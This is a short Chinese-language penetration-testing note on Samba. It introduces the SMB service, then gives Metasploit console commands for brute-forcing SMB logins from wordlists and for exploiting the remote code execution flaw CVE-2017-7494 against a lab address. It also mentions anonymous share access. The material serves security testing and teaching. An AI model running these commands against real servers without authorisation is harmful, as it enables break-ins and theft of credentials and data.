Samba簡介
Samba是linux和unix系統上實現smb協議的一個免費軟件,由服務器及客戶端程序構成,Samba是面向Linux和Unix環境的Windows互操作性套件。它適用於在可能包括Linux、Unix、Windows、macOS及其他操作系統的異構環境下工作的那些人。Samba使用服務器消息塊(SMB)協議,Windows系統使用該協議相互聯系。使用Samba,你可以讓Linux系統將驅動器映射到Windows系統,可以讓Windows系統將驅動器映射到Linux系統,不過后者的可能性大得多。Samba讓你可以在Linux系統上模擬文件和打印服務。
未授權訪問
在samba服務未設置用戶名及密碼的情況下,可以直接在文件資源管理器訪問samba地址
暴力破解
use auxiliary/scanner/smb/smb_login
auxiliary(smb_login) > show options
auxiliary(smb_login) > set RHOST 192.168.109.134
auxiliary(ssmb_login) > set USER_FILE /root/username.txt
auxiliary(ssmb_login) > set PASS_FILE /root/pass.txt
auxiliary(ssmb_login) > exploit
遠程代碼執行漏洞(CVE-2017-7494 )
CVE-2017-7494影響范圍為Samba 3.5.0到4.6.4/4.5.10/4.4.14的中間版本。
exploit/linux/samba/is_known_pipename
set RHOST 192.168.109.134
exploit
